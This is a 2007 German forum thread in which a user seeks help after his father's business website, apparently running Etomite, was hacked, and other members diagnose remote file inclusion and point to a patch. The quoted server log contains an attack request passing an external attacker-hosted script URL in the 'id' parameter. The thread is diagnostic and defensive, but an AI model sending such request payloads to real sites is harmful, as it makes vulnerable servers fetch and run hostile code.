website gehackt/server spezis gefragt...

Seite 1 von 1 - Forum: Applications, Apps & Drivers auf overclockers.at

URL: https://www.overclockers.at/applications/website_gehackt_server_spezis_gefragt_186564/page_1 - zur Vollversion wechseln!


k3nny_gat schrieb am 17.10.2007 um 09:46

hallo liebe oc-community!
hab folgendes problem schon im g.at-forum gepostet, aber du wurde mir nicht so recht geholfen und der tipp gegeben es einmal hier zu versuchen.

die webseite meines vaters war jetzt für ein paar tage nicht erreichbar. auf anfrage beim host bekam er die melung zurück, die website sei gehackt worden plus text-schnippsel aus einem log-file.

weiters meinte man, sollte diese sicherheitslücke von meinem vater nicht behoben werden, werde die seite wieder gesperrt.


hier das log:

quote: /home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - -
[08/Sep/2007:12:21:19 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"
/home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - -
[08/Sep/2007:12:21:32 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"
/home/diabolo/logs/transfer.log:189-19-21-18.dsl.telesp.net.br - -
[08/Sep/2007:12:51:24 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.0" 302 0 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"




meine frage ist jetzt:
ich weiß jetzt nicht 100% wie das bei meinem vater abläuft, aber er ist definitiv kein webadmin, er lädt die sachen nur rauf. wie soll also er eine sicherheitslücke schließen, die eigentlich der host und eigentliche serveradmin beheben sollte?

bzw. kann wer aus dem log-ausschnitt wirklich erkennen um was für einen "hack" es sich handelt?


HowlingWolf schrieb am 17.10.2007 um 09:51

Ok was für ne Seite ist das eigentlich von deinem Vater?
Verwendet er irgendwelche Datenbanken? Ists ein Forum? Ein Blog? Welche Software läuft drauf?


COLOSSUS schrieb am 17.10.2007 um 09:52

Das einzige, was ich mir aufgrund der wirklich spaerlichen Information vorstellen koennte ist, dass eure Webapplikation ueber den GET-Parameter "id" remote file inclusion zulaesst. Ein wget-Useragent allein (auch von einem uralt-Red-Hat) ist jedenfalls noch nicht Verdachtsmoment genug...

Welche Webapplikation laeuft denn auf eurem Webspace?


BobbyPI schrieb am 17.10.2007 um 09:52

URL? /e. Rest wurde schon gesagt..


k3nny_gat schrieb am 17.10.2007 um 09:57

pf. ihr überhäufts mich mit fragen. ;p

ich hab ehrlich gesagt keine ahnung. ist die website zum geschäft meines vaters und ich hatte mit derer administration noch nichts am hut. dass über die url code ausgeführt/oder, zweiter gedanke, der server einfach nur zugemüllt wird, war auch mein erster gedanke. aber da ich nicht regelmäßig mit httpds arbeite fehlt mir da einfach die erfahrung.

es kommt mir aber immer mehr der verdacht, dass für die behebung dieses fehlers nicht mein vater sondern der wirkliche host selbst verantwortlich ist...


Umlüx schrieb am 17.10.2007 um 09:59

denke auch es wird das von colossus beschriebene problem sein. die laden über den parameter ID eine externe webseite rein die sonst was macht. direkte includes in php sind böse..


HowlingWolf schrieb am 17.10.2007 um 10:00

Hmm es kann sein dass eine alte PHP Version auf diesem Host installiert ist... Oder wie Colossus schon geschrieben hat eine File inclusion bei einer Abfrage möglich ist ... Selbst geschriebene Software?

Ohne mehr Informationen wirst keine detailiertere Antwort bekommen. Tut mir leid.


BobbyPI schrieb am 17.10.2007 um 10:06

Ist die Webseitenadresse geheim? Ansonsten poste sie mal, vielleicht können wir dir dann mehr sagen...

Lg,

Robert


H.E.N.K schrieb am 17.10.2007 um 10:08

Falls du Literatur benötigst um etwaige Sicherheitslücken -in der PHP application- zu stopfen :

PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren
# ISBN-10: 3898644502
# ISBN-13: 978-3898644501

Gibt einen recht guten Überblick

Der Rest wurde imo schon gesagt/gefragt :)


k3nny_gat schrieb am 17.10.2007 um 10:49

website ist diabolo.at


rettich schrieb am 17.10.2007 um 11:04

welche version von etomite ist denn drauf?

zB
http://secunia.com/advisories/18556/

wenn man im google nach

"GET /index.php?id=http://0x00013.50webs.org/tesgcc.txt?"

sucht, findet man zahlreiche einträge. dürfte ein recht beliebter exploit von anfälliger PHP software sein (php securemode=off?)


HowlingWolf schrieb am 17.10.2007 um 11:14

[OT]

Zitat von k3nny_gat
website ist diabolo.at

Das ist dein Vater? Sagst ihm danke für die Smilies auf der Rechnung :)
[/OT]

Wenns PHP Secure Mode OFF ist dann ists ein Problem des Providers...

Wie man der von rettich geposteten Security Bulletin entnehmen kann gibts eh einen Etomite Patch der das Problem beseitigen sollte.
Zeit für ein Software Update?


k3nny_gat schrieb am 17.10.2007 um 15:24

wtf smilies auf der rechnung?! :D




overclockers.at v4.thecommunity
© all rights reserved by overclockers.at 2000-2025